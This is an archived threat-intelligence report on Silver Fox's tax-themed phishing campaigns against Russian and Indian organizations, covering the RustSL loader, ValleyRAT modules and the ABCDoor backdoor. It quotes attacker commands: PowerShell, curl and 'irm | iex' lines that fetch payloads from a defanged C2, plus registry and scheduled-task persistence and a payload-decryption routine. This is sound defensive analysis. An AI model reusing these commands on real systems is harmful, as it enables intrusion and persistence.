{
	"id": "f9430ef5-ce35-4eb9-b678-4706553cc7a3",
	"created_at": "2026-05-07T02:43:44.048593Z",
	"updated_at": "2026-05-07T02:44:10.993926Z",
	"deleted_at": null,
	"sha1_hash": "40a740cc65981f960ecd5f2ee1450bf00b760d44",
	"title": "Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2825572,
	"plain_text": "Silver Fox uses the new ABCDoor backdoor to target organizations\r\nin Russia and India\r\nBy Anton Kargin\r\nPublished: 2026-04-30 · Archived: 2026-05-07 02:09:12 UTC\r\nIn December 2025, we detected a wave of malicious emails designed to look like official correspondence from the\r\nIndian tax service. A few weeks later, in January 2026, a similar campaign began targeting Russian organizations.\r\nWe have attributed this activity to the Silver Fox threat group.\r\nBoth waves followed a nearly identical structure: phishing emails were styled as official notices regarding tax\r\naudits or prompted users to download an archive containing a “list of tax violations”. Inside the archive was a\r\nmodified Rust-based loader pulled from a public repository. This loader would download and execute the well-known ValleyRAT backdoor. The campaign impacted organizations across the industrial, consulting, retail, and\r\ntransportation sectors, with over 1600 malicious emails recorded between early January and early February.\r\nDuring our investigation, we also discovered that the attackers were delivering a new ValleyRAT plugin to victim\r\ndevices, which functioned as a loader for a previously undocumented Python-based backdoor. We have named this\r\nbackdoor ABCDoor. Retrospective analysis reveals that ABCDoor has been part of the Silver Fox arsenal since at\r\nleast late 2024 and has been utilized in real-world attacks from the first quarter of 2025 to the present day.\r\nEmail campaign\r\nIn the January campaign, victims received an email purportedly from the tax service with an attached PDF file.\r\nPhishing email sent to victims in Russia\r\nThe PDF contained two clickable links to download an archive, both leading to a malicious website:\r\nabc.haijing88[.]com/uploads/фнс/фнс.zip.\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 1 of 30\n\nContents of the PDF file from the January phishing wave\r\nContents of the фнс.zip archive\r\nIn the December campaign, the malicious code was embedded directly within the files attached to the email.\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 2 of 30\n\nPhishing email sent to victims in India\r\nThe email shown in the screenshot above was sent via the SendGrid cloud platform and contained an archive\r\nnamed ITD.-.rar . Inside was a single executable file, Click File.exe, with an Adobe PDF icon (the RustSL\r\nloader).\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 3 of 30\n\nContents of ITD.-.rar\r\nAdditionally, in late December, emails were distributed with an attachment titled GST.pdf containing two links\r\nleading to hxxps://abc.haijing88[.]com/uploads/印度邮箱/CBDT.rar. (印度邮箱 translates from Chinese as\r\n“Indian mailbox”).\r\nPDF file from the phishing email\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 4 of 30\n\nBoth versions of the campaign attempt to exploit the perceived importance of tax authority correspondence to\r\nconvince the victim to download the document and initiate the attack chain. The method of using download links\r\nwithin a PDF is specifically designed to bypass email security gateways; since the attached document only\r\ncontains a link that requires further analysis, it has a higher probability of reaching the recipient compared to an\r\nattachment containing malicious code.\r\nRustSL loader\r\nThe attackers utilized a modified version of a Rust-based loader called RustSL, whose source code is publicly\r\navailable on GitHub with a description in Chinese:\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 5 of 30\n\nScreenshot of the description from the RustSL loader GitHub project\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 6 of 30\n\nThe description also refers to RustSL as an antivirus bypass framework, as it features a builder with extensive\r\ncustomization options:\r\nEight payload encryption methods\r\nThirteen memory allocation methods\r\nTwelve sandbox and virtual machine detection techniques\r\nThirteen payload execution methods\r\nFive payload encoding methods\r\nFurthermore, the original version of RustSL encrypts all strings by default and inserts junk instructions to\r\ncomplicate analysis.\r\nThe Silver Fox APT group first began using a modified version of RustSL in late December 2025.\r\nSilver Fox RustSL\r\nThis section examines the key changes the Silver Fox group introduced to RustSL. We will refer to this\r\ncustomized version as Silver Fox RustSL to distinguish it from the original.\r\nThe steganography.rs module\r\nThe attackers added a module named steganography.rs to RustSL. Despite the name, it has little to do with actual\r\nsteganography; instead, it implements the unpacking logic for the malicious payload.\r\nThe usage of the new module within the Silver Fox RustSL code\r\nThe threat actors also modified the RustSL builder to support the new format and payload packing.\r\nThe attackers employed several methods to deliver the encrypted malicious payload. In December, we observed\r\nfiles being downloaded from remote hosts followed by delivery within the loader itself. Later, the attackers shifted\r\nalmost entirely to placing the malicious payload inside the same archive as the loader, disguised as a standalone\r\nfile with extensions like PNG, HTM, MD, LOG, XLSX, ICO, CFG, MAP, XML, or OLD.\r\nEncrypted malicious payload format\r\nThe encrypted payload file delivered by the Silver Fox RustSL loader followed this structure:\r\n1 \u003cRSL_START\u003ersl_encrypted_payload\u003cRSL_END\u003e\r\nIf additional payload encoding was selected in the builder, the loader would decode the data before proceeding\r\nwith decryption.\r\nThe rsl_encrypted_payload followed this specific format:\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 7 of 30\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nchar sha256_hash[32]; // decrypted payload hash\r\nDWORD enc_payload_len;\r\nWORD sgn_decoder_size;\r\nchar sgn_iterations;\r\nchar sgn_key;\r\nchar decoder[sgn_decoder_size];\r\nchar enc_payload[enc_payload_len];\r\nBelow is a description of the data blocks contained within it:\r\nsha256_hash: the hash of the decrypted payload. After decryption, the loader calculates the SHA256 hash\r\nand compares it against this value; if they do not match, the process terminates.\r\nenc_payload_len: the size of the encrypted payload\r\nsgn_iterations and sgn_key: parameters used for decryption\r\nsgn_decoder_size and decoder: unused fields\r\nenc_payload: the primary payload\r\nNotably, the new proprietary steganography.rs module was implemented using the same logic as the public\r\nRustSL modules (such as ipv4.rs, ipv6.rs, mac.rs, rc4.rs, and uuid.rs in the decrypt directory). It utilized a similar\r\npayload structure where the first 32 bytes consist of a SHA-256 hash and the payload size.\r\nTo decrypt the malicious payload, steganography.rs employed a custom XOR-based algorithm. Below is an\r\nequivalent implementation in Python:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\ndef decrypt(data: bytes, sgn_key: int, sgn_iterations: int) -\u003e bytes:\r\n    buf = bytearray(data)\r\n    xor_key = sgn_key \u0026 0xFF\r\n    for _ in range(sgn_iterations):\r\n        k = xor_key\r\n        for i in range(len(buf)):\r\n            dec = buf[i] ^ k\r\n            if k \u0026 1:\r\n                k = (dec ^ ((k \u003e\u003e 1) ^ 0xB8)) \u0026 0xFF\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 8 of 30\n\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n            else:\r\n                k = (dec ^ (k \u003e\u003e 1)) \u0026 0xFF\r\n            buf[i] = dec\r\n    return bytes(buf)\r\nThe unpacking process consists of the following stages:\r\n1. 1 Extraction of rsl_encrypted_payload.The loader extracts the encrypted payload body located between the\r\n\u003cRSL_START\u003e and \u003cRSL_END\u003e markers.\r\nOriginal file containing the encrypted malicious payload\r\n2. 2 XOR decryption with a hardcoded key.Most loaders used the hardcoded key RSL_STEG_2025_KEY.\r\n3. 3 Payload decoding occurs if the corresponding setting was enabled in the builder.The GitHub version of\r\nthe builder offers several encoding options: Base64, Base32, Hex, and urlsafe_base64. Silver Fox utilized\r\neach option at least once. Base64 was the most frequent choice, followed by Hex and Base32, with\r\nurlsafe_base64 appearing in a few samples.\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 9 of 30\n\nEncrypted malicious payload prior to the final decryption stage\r\n4. 4 Decryption of the final payload using a multi-pass XOR algorithm that modifies the key after each\r\niteration (as demonstrated in the Python algorithm provided above).\r\nThe guard.rs module\r\nAnother module added to Silver Fox RustSL is guard.rs. It implements various environment checks and country-based geofencing.\r\nIn the earliest loader samples from late December 2025, the Silver Fox group utilized every available method for\r\ndetecting virtual machines and sandboxes, while also verifying if the device was located in a target country. In\r\nlater versions, the group retained only the geolocation check; however, they expanded both the list of countries\r\nallowed for execution and the services used for verification.\r\nThe GitHub version of the loader only includes China in its country list. In customized Silver Fox loaders built\r\nprior to January 19, 2026, this list included India, Indonesia, South Africa, Russia, and Cambodia. Starting with a\r\nsample dated January 19, 2026 (MD5: e6362a81991323e198a463a8ce255533), Japan was added to the list.\r\nTo determine the host country, Silver Fox RustSL sends requests to five public services:\r\nip-api.com (the GitHub version relies solely on this service)\r\nipwho.is\r\nipinfo.io\r\nipapi.co\r\nwww.geoplugin.net\r\nPhantom Persistence\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 10 of 30\n\nWe discovered that a loader compiled on January 7, 2026 (MD5: 2c5a1dd4cb53287fe0ed14e0b7b7b1b7), began to\r\nuse the recently documented Phantom Persistence technique to establish persistence. This method abuses\r\nfunctionality designed to allow applications requiring a reboot for updates to complete the installation process\r\nproperly. The attackers intercept the system shutdown signal, halt the normal shutdown sequence, and trigger a\r\nreboot under the guise of an update for the malware. Consequently, the loader forces the system to execute it upon\r\nOS startup. This specific sample was compiled in debug mode and logged its activity to rsl_debug.log, where we\r\nidentified strings corresponding to the implementation of the Phantom Persistence technique:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n[unix_timestamp] God-Tier Telemetry Blinding: Deployed via HalosGate Indirect Syscalls.\r\n[unix_timestamp] RSL started in debug mode.\r\n[unix_timestamp] ==========================================\r\n[unix_timestamp]     Phantom Persistence Module (Hijack Mode)\r\n[unix_timestamp] ==========================================\r\n[unix_timestamp] [*] Calling RegisterApplicationRestart...\r\n[unix_timestamp] [+] RegisterApplicationRestart succeeded.\r\n[unix_timestamp] [*] Note: This API mainly works for application crashes, not for user-initiated\r\nshutdowns.\r\n[unix_timestamp] [*] For full persistence, you need to trigger the shutdown hijack logic.\r\n[unix_timestamp] [*] Starting message thread to monitor shutdown events...\r\n[unix_timestamp] [+] SetProcessShutdownParameters (0x4FF) succeeded.\r\n[unix_timestamp] [+] Window created successfully, message loop started.\r\n[unix_timestamp] [+] Phantom persistence enabled successfully.\r\n[unix_timestamp] [*] Hijack logic: Shutdown signal -\u003e Abort shutdown -\u003e Restart with\r\nEWX_RESTARTAPPS.\r\n[unix_timestamp] Phantom persistence enabled.\r\n[unix_timestamp] Mouse movement check passed.\r\n[unix_timestamp] IP address check passed.\r\n[unix_timestamp] Pass Sandbox/VM detection.\r\nAttack chain and payloads\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 11 of 30\n\nDuring this phishing campaign, Silver Fox utilized two primary methods for delivering malicious archives:\r\nAs an email attachment\r\nVia a link to an external attacker-controlled website contained within a PDF attachment\r\nWe also observed three different ways the payload was positioned relative to the loader:\r\nEmbedded within the loader body\r\nHosted on an external website as a PNG image\r\nPlaced within the same archive as the loader\r\nThe diagram below illustrates the attack chain using the example of an email containing a PDF file and the\r\nsubsequent delivery of a malicious payload from an external attacker-controlled website.\r\nAttack chain of the campaign utilizing the RustSL loader\r\nThe infection chain begins when the user runs an executable file (the Silver Fox modification of the RustSL\r\nloader) disguised with a PDF or Excel icon. RustSL then loads an encrypted payload, which functions as\r\nshellcode. This shellcode then downloads an encrypted ValleyRAT (also known as Winos 4.0) backdoor module\r\nnamed 上线模块.dll from the attackers’ server. The filename translates from Chinese as “online-module.dll”, so\r\nfor the sake of clarity, we’ll refer to it as the Online module.\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 12 of 30\n\nBeginning of the decrypted payload: shellcode for loading the ValleyRAT (Winos 4.0) Online module\r\nThe Online module proceeds to load the core component of ValleyRAT: the Login module (the original filename\r\n登录模块.dll_bin translates from Chinese as “login-module.dll_bin”). This module manages C2 server\r\ncommunication, command execution, and the downloading and launching of additional modules.\r\nThe initial shellcode, as well as the Online and Login modules, utilize a configuration located at the end of the\r\nshellcode:\r\nEnd of the decrypted payload: ValleyRAT (Winos 4.0) configuration\r\nThe values between the “|” delimiters are written in reverse order. By restoring the correct character sequence, we\r\nobtain the following string:\r\n1\r\n|p1:207.56.138[.]28|o1:6666|t1:1|p2:127.0.0.1|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:飘\r\n诈|bb:1.0|bz:2025.11.16|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 13 of 30\n\nThe key configuration parameters in this string are:\r\np#, o#: IP addresses and ports of the ValleyRAT C2 servers in descending order of priority\r\nbz: the creation date of the configuration\r\nThe Silver Fox group has long employed the infection chain described above – from the encrypted shellcode\r\nthrough the loading of the Login module – to deploy ValleyRAT. This procedure and its configuration parameters\r\nare documented in detail in industry reports: (1, 2, and 3).\r\nOnce the Login module is running, ValleyRAT enters command-processing mode, awaiting instructions from the\r\nC2. These commands include the retrieval and execution of various additional modules.\r\nValleyRAT utilizes the registry to store its configurations and modules:\r\nRegistry key Description\r\nHKCU:\\Console\\0 For x86-based modules\r\nHKCU:\\Console\\1 For x64-based modules\r\nHKCU:\\Console\\IpDate Hardcoded registry location checked upon Login module startup\r\nHKCU:\\Software\\IpDates_info Final configuration\r\nThe ValleyRAT builder leaked in March 2025 contained 20 primary and over 20 auxiliary modules. During this\r\nspecific phishing campaign, we discovered that after the main module executed, it loaded two previously unseen\r\nmodules with similar functionality. These modules were responsible for downloading and launching a previously\r\nundocumented Python-based backdoor we have dubbed ABCDoor.\r\nCustom ValleyRAT modules\r\nThe discovered modules are named 保86.dll and 保86.dll_bin. Their parameters are detailed in the table below.\r\nHKCU:\\Console\\0 registry key\r\nvalue\r\nModule\r\nname\r\nLibrary MD5 hash\r\nCompiled\r\ndate and\r\ntime\r\n(UTC)\r\nfc546acf1735127db05fb5bc354093e0 保86.dll 4a5195a38a458cdd2c1b5ab13af3b393\r\n2025-12-\r\n04\r\n04:34:31\r\nfc546acf1735127db05fb5bc354093e0 保86.dll e66bae6e8621db2a835fa6721c3e5bbe\r\n2025-12-\r\n04\r\n04:39:32\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 14 of 30\n\n2375193669e243e830ef5794226352e7\r\n保\r\n86.dll_bin\r\ne66bae6e8621db2a835fa6721c3e5bbe\r\n2025-12-\r\n04\r\n04:39:32\r\nOf particular note is the PDB path found in all identified modules:\r\nC:\\Users\\Administrator\\Desktop\\bat\\Release\\winos4.0测试插件.pdb. In Chinese, 测试插件 translates to “test\r\nplugin”, which may suggest that these modules are still in development.\r\nUpon execution, the 保86.dll module determines the host country by querying the same five services used by the\r\nguard.rs module in Silver Fox RustSL: ipinfo.io, ip-api.com, ipapi.co, ipwho.is, and geoplugin.net. For the module\r\nto continue running, the infected device must be located in one of the following countries:\r\nCountries where the 保86.dll module functions\r\nIf the geolocation check passes, the module attempts to download a 52.5 MB archive from a hardcoded address\r\nusing several methods. The sample with MD5 4a5195a38a458cdd2c1b5ab13af3b393 queried\r\nhxxp://154.82.81[.]205/YD20251001143052.zip, while the sample with MD5\r\ne66bae6e8621db2a835fa6721c3e5bbe queried\r\nhxxp://154.82.81[.]205/YN20250923193706.zip.\r\nInterestingly, Silver Fox updated the YD20251001143052.zip archive multiple times but continued to host it on\r\nthe same C2 (154.82.81[.]205) without changing the filename.\r\nThe module implements the following download methods:\r\n1. 1 Using the InternetReadFile function with the User-Agent PythonDownloader\r\n2. 2 Using the URLDownloadToFile function\r\n3. 3 Using PowerShell:\r\n1 powershell.exe -Command \"\u0026 {[System.Net.ServicePointManager]::SecurityProtocol =\r\n[System.Net.SecurityProtocolType]::Tls12;\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 15 of 30\n\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};\r\n$ProgressPreference = 'SilentlyContinue'; try { Invoke-WebRequest -Uri\r\n'hxxp://154.82.81[.]205/YD20251001143052.zip' -OutFile '$appdata\\appclient\\111.zip' -\r\nUseBasicParsing -TimeoutSec 600 } catch { exit 1 } }\"\r\n4. 4 Using curl:\r\n1\r\ncurl.exe -L -o \"%LOCALAPPDATA%\\appclient\\111.zip\"\r\n\"hxxp://154.82.81[.]205/YD20251001143052.zip\" --silent --show-error --insecure --max-time 600\r\nThe archive was saved to the path %LOCALAPPDATA%\\appclient\\111.zip.\r\nContents of the 111.zip archive\r\nThe archive is quite large because the python directory contains a Python environment with the packages required\r\nto run the previously unknown ABCDoor backdoor (which we will describe in the next section), while the ffmpeg\r\ndirectory includes ffmpeg.exe, a statically linked, legitimate audio/video tool that the backdoor uses for screen\r\ncapturing.\r\nOnce downloaded, the DLL module extracts the archive using COM methods and runs the following command to\r\nexecute update.bat:\r\n1 cmd.exe /c \"C:\\Users\\\u003cuser\u003e\\AppData\\Local\\appclient\\update.bat\"\r\nThe update.bat script copies the extracted files to C:\\ProgramData\\Tailscale. This path was chosen intentionally: it\r\ncorresponds to the legitimate utility Tailscale (a mesh VPN service based on the WireGuard protocol that connects\r\ndevices into a single private network). By mimicking a VPN service, the attackers likely aim to mask their\r\npresence and complicate the analysis of the compromised system.\r\n1\r\n2\r\n3\r\n4\r\n@echo off\r\nset \"script_dir=%~dp0\"\r\nset SRC_DIR=%script_dir%\r\nset DES_DIR=C:\\ProgramData\\Tailscale\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 16 of 30\n\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\nrmdir /s /q \"%DES_DIR%\"\r\nmkdir \"%DES_DIR%\"\r\ncall :recursiveCopy \"%SRC_DIR%\" \"%DES_DIR%\"\r\nstart \"\" /B \"%DES_DIR%\\python\\pythonw.exe\" -m appclient\r\nexit /b\r\n:recursiveCopy\r\nset \"src=%~1\"\r\nset \"dest=%~2\"\r\nif not exist \"%dest%\" mkdir \"%dest%\"\r\nfor %%F in (\"%src%\\*\") do (\r\n    copy \"%%F\" \"%dest%\" \u003enul\r\n)\r\nfor /d %%D in (\"%src%\\*\") do (\r\n    call :recursiveCopy \"%%D\" \"%dest%\\%%~nxD\"\r\n)\r\nexit /b\r\nContents of update.bat\r\nAfter copying the files, the script launches the appclient Python module using the legitimate pythonw tool:\r\n1 start \"\" /B \"%DES_DIR%\\python\\pythonw.exe\" -m appclient\r\nABCDoor Python backdoor\r\nThe primary entry point for the appclient module, the __main__.py file, contains only a few lines of code. These\r\nlines are responsible for utilizing the setproctitle library and executing the run function, to which the C2 address is\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 17 of 30\n\npassed as a parameter.\r\nCode for main.py: the module entry point\r\nThe setproctitle library is primarily used on Linux or macOS systems to change a displayed process name.\r\nHowever, its functionality is significantly limited on Windows; rather than changing the process name itself, it\r\ncreates a named object in the format python(\u003cpid\u003e): \u003cproctitle\u003e . For example, for the appclient module, this\r\nobject would appear as follows:\r\n1 \\Sessions\\1\\BaseNamedObjects\\python(8544): AppClientABC\r\nWe believe the use of setproctitle may indicate the existence of backdoor versions for non-Windows systems, or at\r\nleast plans to deploy it in such environments.\r\nThe appclient.core module has a PYD extension and is a DLL file compiled with Cython 3.0.7. This is the core\r\nmodule of the backdoor, which we have named ABCDoor because nearly all identified C2 addresses featured the\r\nthird-level domain abc.\r\nUpon execution, the backdoor establishes persistence in the following locations:\r\n1. 1 Windows registry: It adds \"\u003cpath_to_pythonw.exe\u003e\" -m appclient to the value\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:AppClient, e.g:\r\n1 \"C:\\Users\\\u0026lt;username\u0026gt;\\AppData\\Local\\appclient\\python\\pythonw.exe\" -m appclient\r\nPersistence is established by executing the following command:\r\n1\r\ncmd.exe /c \"reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"AppClient\" /t\r\nREG_SZ /d \"\\\"\u003cpath_to_pythonw.exe\u003e\\\" -m appclient\" /f\"\r\n2. 2 Task scheduler: The malware executes\r\n1\r\ncmd.exe /c \"schtasks /create /sc minute /mo 1 /tn \"AppClient\" /tr \"\u003cpath_to_pythonw.exe\u003e -m\r\nappclient\" /f\"\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 18 of 30\n\nThe command creates a task named “AppClient” that runs every minute.\r\nThe backdoor is built on the asyncio and Socket.IO Python libraries. It communicates with its C2 via HTTPS and\r\nuses event handlers to processes messages asynchronously. The backdoor follows object-oriented programming\r\nprinciples and includes several distinct classes:\r\nMainManager: handles C2 connection and authorization (sending system metadata)\r\nMessageManager: registers and executes message handlers\r\nAutoStartManager: manages backdoor persistence\r\nClientManager: handles backdoor updates and removal\r\nSystemInfoManager: collects data from the victim’s system, including screenshots\r\nRemoteControlManager: enables remote mouse and keyboard control via the pynput library and manages\r\nscreen recording (using the ScreenRecorder child class)\r\nFileManager: performs file system operations\r\nKeyboardManager: emulates keyboard input\r\nProcessManager: manages system processes\r\nClipboardManager: exfiltrates clipboard contents to the C2\r\nCryptoManager: provides functions for encrypting and decrypting files and directories (currently limited to\r\nDPAPI; asymmetric encryption functions lack implementation)\r\nUtils: auxiliary functions (file upload/download, archive management, error log uploading, etc.)\r\nBackdoor strings with characteristic names\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 19 of 30\n\nUpon connecting, ABCDoor sends an auth message to the C2 with the following information in JSON format:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n\"role\": \"client\",\r\n\"device_info\": {\r\n\"device_name\": device_name,\r\n\"os_name\": os_name,\r\n\"os_version\": os_version,\r\n\"os_release\": os_release,\r\n\"device_id\": device_id,\r\n\"install_channel\": \"\u003cchannel_name_from_registry\u003e\", # optional field\r\n\"first_install_time\": \"\u003cinstall_time_from_registry\u003e\", # optional field\r\n},\r\n\"version\": 157 # hard-coded ABCDoor version\r\nThe code for retrieving the device identifier (device_id) in the backdoor is somewhat peculiar:\r\n1\r\n2\r\ndevice_id = Utility.get_machine_guid_via_file_func()\r\ndevice_id = Utility.get_machine_guid_via_reg()\r\nFirst, the get_machine_guid_via_file_func function attempts to read an identifier from the file\r\n%LOCALAPPDATA%\\applogs\\device.log. If the file does not exist, it is created and initialized with a random\r\nUUID4 value. However, immediately after this, the get_machine_guid_via_reg function overwrites the identifier\r\nobtained by the first function with the value from HKLM:\\SOFTWARE\\Microsoft\\Cryptography:MachineGuid.\r\nThis likely indicates a bug in the code.\r\nThe primary characteristic of this backdoor is the absence of typical remote control features, such as creating a\r\nremote shell or executing arbitrary commands. Instead, it implements two alternative methods for manipulating\r\nthe infected device:\r\nEmulating a double click while broadcasting the victim’s screen\r\nA \"file_open\" message within the FileManager class, which calls the os.startfile function. This\r\nexecutes a specified file using the ShellExecute function and the default handler for that file extension\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 20 of 30\n\nFor screen broadcasting, the backdoor utilizes a standalone ffmpeg.exe file included in the ABCDoor archive.\r\nWhile early versions could only stream from a single monitor, recent iterations have introduced support for\r\nstreaming up to four monitors simultaneously using the Desktop Duplication API (DDA). The broadcasting\r\nprocess relies on the screen capture functions\r\nRemoteControl::ScreenRecorder::start_single_monitor_ddagrab ,\r\nRemoteControl::ScreenRecorder::start_multi_monitor_ddagrab , and\r\nRemoteControl::ScreenRecorder::test_ddagrab_support . These functions generate a lengthy string of launch\r\narguments for ffmpeg; these arguments account for monitor orientation (vertical or horizontal) and quantity,\r\nstitching the data into a single, cohesive stream.\r\nBecause ABCDoor runs within a legitimate pythonw.exe process, it can remain hidden on a victim’s system for\r\nextended periods. However, its operation involves various interactions with the registry and file system that can be\r\nused for detection. Specifically, ABCDoor:\r\nWrites its initial installation timestamp to the registry value HKCU:\\Software\\CarEmu:FirstInstallTime\r\nCreates the directory and file %LOCALAPPDATA%\\applogs\\device.log to store the victim’s ID\r\nLogs any exceptions to %LOCALAPPDATA%\\applogs\\exception_logs.zip. Interestingly, Silver Fox even\r\nimplemented a Utility::upload_exception_logs function to send this archive to a specified URI, likely\r\nto help debug and refine the malware’s performance\r\nAdditionally, ABCDoor features self-update and self-deletion capabilities that generate detectable artifacts.\r\nUpdates are downloaded from a specific URI to %TEMP%\\tmpXXXXXXXX\\update.zip (where XXXXXXXX\r\nrepresents random alphanumeric characters), extracted to %TEMP%\\tmpXXXXXXXX\\update, and executed via a\r\nPowerShell command:\r\n1\r\npowershell -Command \"Start-Sleep -Seconds 5; Start-Process -FilePath\r\n\\\"%TEMP%\\tmpXXXXXXXX\\update\\update.ps1\\\" -ArgumentList \\\"%LOCALAPPDATA%\\appclient\\\"\r\n-WindowStyle Hidden\"\r\nThe existing ABCDoor process is then forcibly terminated.\r\nABCDoor versions\r\nThrough retrospective analysis, we discovered that the earliest version of ABCDoor (MD5:\r\n5b998a5bc5ad1c550564294034d4a62c) surfaced in late 2024. The backdoor evolved rapidly throughout 2025.\r\nThe table below outlines the primary stages of its evolution:\r\nVersion\r\nCompiled\r\ndate (UTC)\r\nKey updates ABCDoor .pyd MD5 hash\r\n121 2024.12.19\r\n18:27:11\r\n–  Minimal functionality (file\r\ndownloads, remote control using the\r\nGraphics Device Interface (GDI) in\r\n5b998a5bc5ad1c550564294034d4a62c\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 21 of 30\n\nffmpeg)\r\n–  No OOP used\r\n–  Registry persistence\r\n143\r\n2025.02.04\r\n01:15:00\r\nClient updates\r\n–  Task scheduler persistence\r\n–  OOP implementation (classes)\r\n–  Clipboard management\r\n–  Process management\r\n–  Asymmetric file and directory\r\nencryption\r\nc50c980d3f4b7ed970f083b0d37a6a6a\r\n152\r\n2025.04.01\r\n15:39:36\r\n–  DPAPI encryption functions\r\n–  Chunked file uploading to C2\r\nde8f0008b15f2404f721f76fac34456a\r\n154\r\n2025.05.09\r\n13:36:24\r\n–  Implementation of installation\r\nchannels\r\n–  Key combination emulation\r\n9bf9f635019494c4b70fb0a7c0fb53e4\r\n156\r\n2025.08.11\r\n13:36:10\r\n–  Retrieval and logging of initial\r\ninstallation time to the registry\r\na543b96b0938de798dd4f683dd92a94a\r\n157\r\n2025.08.28\r\n14:23:57\r\n–  Use of DDA source in ffmpeg for\r\nmonitor screen broadcasting\r\nfa08b243f12e31940b8b4b82d3498804\r\n157\r\n2025.09.23\r\n11:38:17\r\n–  Compiled with Cython 3.0.7\r\n(previous version used Cython 3.0.12)\r\n13669b8f2bd0af53a3fe9ac0490499e5\r\nEvolution of ABCDoor distribution methods\r\nAlthough the first version of the backdoor appeared in late 2024, the threat actor likely began using it in attacks\r\naround February or March 2025. At that time, the backdoor was distributed using stagers written in C++ and Go:\r\nC++ stagerThe file GST Suvidha.exe (MD5: 04194f8ddd0518fd8005f0e87ae96335) downloaded a\r\nloader (MD5: f15a67899cfe4decff76d4cd1677c254) from hxxps://mcagov[.]cc/download.php?\r\ntype=exe. This loader then downloaded the ABCDoor archive from hxxps://abc.fetish-friends[.]com/uploads/appclient.zip, extracted it, and executed it.\r\nGo stagerThe file GSTSuvidha.exe (MD5: 11705121f64fa36f1e9d7e59867b0724) executed a\r\nremote PowerShell script:\r\n1 powershell.exe -Command \"irm hxxps://abc.fetish-friends[.]com/setup/install | iex\"\r\nThis script downloaded the ABCDoor archive and launched it.\r\nLater, from May to August 2025, Silver Fox varied their delivery techniques through several methods:\r\nhttps://securelist.com/silver-fox-tax-notification-campaign/119575/\r\nPage 22 of 30\n\nUtilizing TinyURL:Stagers initially queried TinyURL links, which then redirected to the full\r\naddresses for downloading the next stage:\r\nhxxps://tinyurl[.]com/4nzkync8 -\u003e hxxps://roldco[.]com/api/download/c51bbd17-\r\nef08-4d6c-ab4c-d7bf49483dd6\r\nhxxps://tinyurl[.]com/bde63yuu -\u003e hxxps://sudsmama[.]com/api/download/c8ea0a2c-42c2-4159-9337-ee774ed5e7cb\r\nUtilizing URLs with arguments formatted as channel=[word_MMDD] :\r\nhxxps://abc.fetish-friends[.]com/setup?channel=jiqi_0819\r\nhxxps://abc.fetish-friends[.]com/setup/install?channel=whatsapp_0826\r\nhxxps://abc.fetish-friends[.]com/setup/install?channel=dianhua-0903\r\nThanks to these “channel” names, we identified overlaps between ABCDoor and other malicious files likely\r\nbelonging to Silver Fox. These are NSIS installers featuring the branding of the Ministry of Corporate Affairs of\r\nIndia (responsible for regulating industrial companies and the services sector). These installers establish a\r\nconnection to the attackers’ server at hxxps://vnc.kcii2[.]com, providing them with remote access to the victim’s\r\ndevice. Below is the list of files we identified:\r\nRemoteInstaller_20250803165259_whatsapp.exe (MD5:\r\n4d343515f4c87b9a2ffd2f46665d2d57)\r\nRemoteInstaller_20250806_004447_jiqi.exe (MD5: dfc64dd9d8f776ca5440c35fef5d406e)\r\nRemoteInstaller_20250808_174554_dianhua.exe (MD5:\r\neefc28e9f2c0c0592af186be8e3570d2)\r\nMCA-Ministry.exe (MD5: 6cf382d3a0eae57b8baaa263e4ed8d00)\r\nMCA-Ministry.exe (MD5: 32407207e9e9a0948d167dca96c41d1a)\r\nMCA-Ministry.exe (MD5: d17caf6f5d6ba3393a3a865d1c43c3d2)\r\nThe file MCA-Ministry.exe (MD5: 32407207e9e9a0948d167dca96c41d1a) was also hosted on one of the servers\r\nused by the ABCDoor stagers and was downloaded via TinyURL:\r\nhxxps://tinyurl[.]com/322ccxbf -\u003e 